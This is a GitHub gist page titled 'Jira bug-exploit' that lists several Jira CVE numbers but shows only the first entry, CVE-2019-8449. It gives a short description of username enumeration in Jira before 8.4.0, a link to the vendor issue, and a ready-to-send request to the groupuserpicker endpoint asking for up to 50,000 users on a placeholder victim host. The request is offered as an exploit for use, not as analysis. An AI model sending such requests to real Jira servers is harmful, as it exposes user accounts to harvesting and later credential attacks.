Skip to content

Instantly share code, notes, and snippets.

View spwn3r49sd3r00's full-sized avatar
🏠
Working from home

Shail Patel spwn3r49sd3r00

🏠
Working from home
View GitHub Profile
@spwn3r49sd3r00
spwn3r49sd3r00 / Jira bug-exploit
Created January 19, 2021 17:37 — forked from 0x240x23elu/Jira bug-exploit
Jira Bug CVE-2019-8449,CVE-2019-8451,CVE-2019-8451,cve-2018-20824,cve-2020-14179,cve-2020-14181,CVE-2018-5230
cve-2019-8449
The /rest/api/latest/groupuserpicker resource in Jira before version 8.4.0 allows remote attackers to enumerate usernames via an information disclosure vulnerability.
https://jira.atlassian.com/browse/JRASERVER-69796
https://victomhost/rest/api/latest/groupuserpicker?query=1&maxResults=50000&showAvatar=true
=====================================================================================================================================